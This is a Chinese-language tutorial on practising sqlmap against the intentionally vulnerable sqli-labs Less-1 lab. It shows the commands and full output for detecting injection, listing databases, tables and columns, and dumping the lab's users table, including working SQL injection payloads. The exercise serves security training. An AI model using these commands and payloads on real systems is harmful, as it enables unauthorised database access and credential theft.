使用sqli-labs练习社区sqlmap(mysql)
漏洞源代码下载:https://github.com/Audi-1/sqli-labs
工具注入(sqlmap)简单演示
简单测试 (-u url)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --level 3
[*] starting at 15:33:02
[15:33:02] [INFO] resuming back-end DBMS 'mysql'
[15:33:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 1906=1906-- PKiX
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 6992 FROM(SELECT COUNT(*),CONCAT(0x7162786271,(SELECT (ELT(6992=6992,1))),0x7162766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- yOBo
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5)-- PmIF
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: id=-3918' UNION ALL SELECT NULL,CONCAT(0x7162786271,0x58716e444643434d644b55716c6477776464456e4673725a4b65444771624356436a56647a76586b,0x7162766a71),NULL,NULL,NULL-- eMQX
---
[15:33:03] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
注:-v(–level) 3 同时显示注入的payload
列出数据库系统的数据库(–dbs)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --dbs
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[14:51:37] [INFO] fetching database names
[14:51:38] [INFO] the SQL query used returns 6 entries
[14:51:39] [INFO] retrieved: information_schema
[14:51:41] [INFO] retrieved: challenges
[14:51:42] [INFO] retrieved: mysql
[14:51:43] [INFO] retrieved: performance_schema
[14:51:44] [INFO] retrieved: security
[14:51:45] [INFO] retrieved: test
available databases [6]:
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test
列出数据库表(–tables -D 数据库名,若无-D参数则显示数据库中所有表)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --tables -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:03:02] [INFO] fetching tables for database: 'security'
[15:03:03] [INFO] the SQL query used returns 4 entries
[15:03:04] [INFO] retrieved: emails
[15:03:05] [INFO] retrieved: referers
[15:03:06] [INFO] retrieved: uagents
[15:03:07] [INFO] retrieved: users
Database: security
[4 tables]
+----------+
| emails |
| referers |
| uagents |
| users |
+----------+
列出数据库中的列(–column -T 表名 -D 数据库名 若无-D参数则默认当前数据库)
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --column -T 'users' -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:08:34] [INFO] fetching columns for table 'users' in database 'security'
[15:08:36] [INFO] the SQL query used returns 5 entries
[15:08:37] [INFO] retrieved: "id","int(3)"
[15:08:38] [INFO] retrieved: "username","varchar(20)"
[15:08:39] [INFO] retrieved: "password","varchar(20)"
[15:08:40] [INFO] retrieved: "first_name","varchar(8)"
[15:08:41] [INFO] retrieved: "last_name","varchar(8)"
Database: security
Table: users
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| first_name | varchar(8) |
| id | int(3) |
| last_name | varchar(8) |
| password | varchar(20) |
| username | varchar(20) |
+------------+-------------+
获取整某张表的信息(–dump -C column1,column2 -T tablename -D databasename )
sqlmap -u "http://xxx.xxx.xxx.xxx/sqli-labs/Less-1/?id=1" --dump -C 'username','password' -T 'users' -D 'security'
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[15:19:18] [INFO] fetching entries of column(s) 'password, username' for table 'users' in database 'security'
[15:19:18] [INFO] the SQL query used returns 13 entries
[15:19:19] [INFO] retrieved: "Dumb","Dumb"
[15:19:20] [INFO] retrieved: "I-kill-you","Angelina"
[15:19:21] [INFO] retrieved: "p@ssword","Dummy"
[15:19:22] [INFO] retrieved: "crappy","secure"
[15:19:23] [INFO] retrieved: "stupidity","stupid"
[15:19:24] [INFO] retrieved: "genious","superman"
[15:19:25] [INFO] retrieved: "mob!le","batman"
[15:19:26] [INFO] retrieved: "admin","admin"
[15:19:27] [INFO] retrieved: "admin1","admin1"
[15:19:29] [INFO] retrieved: "admin2","admin2"
[15:19:30] [INFO] retrieved: "admin3","admin3"
[15:19:31] [INFO] retrieved: "dumbo","dhakkan"
[15:19:32] [INFO] retrieved: "admin4","admin4"
[15:19:32] [INFO] analyzing table dump for possible password hashes
Database: security
Table: users
[13 entries]
+----------+------------+
| username | password |
+----------+------------+
| Dumb | Dumb |
| Angelina | I-kill-you |
| Dummy | p@ssword |
| secure | crappy |
| stupid | stupidity |
| superman | genious |
| batman | mob!le |
| admin | admin |
| admin1 | admin1 |
| admin2 | admin2 |
| admin3 | admin3 |
| dhakkan | dumbo |
| admin4 | admin4 |
+----------+------------+